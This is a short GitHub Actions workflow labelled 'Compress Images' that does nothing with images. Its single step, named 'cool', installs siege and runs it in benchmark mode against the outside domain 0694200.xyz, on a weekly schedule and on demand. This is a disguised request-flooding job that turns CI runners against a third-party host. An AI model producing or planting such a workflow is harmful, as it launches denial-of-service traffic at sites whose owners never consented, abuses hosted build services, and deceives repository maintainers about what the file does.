name: Compress Images
on:
  workflow_dispatch:
  schedule:
    - cron: '00 23 * * 0'
jobs:
  build:
      name: calibreapp/image-actions
      runs-on: ubuntu-latest
      steps:
        - name: cool
          run: |
            sudo apt install siege
            siege -b 0694200.xyz
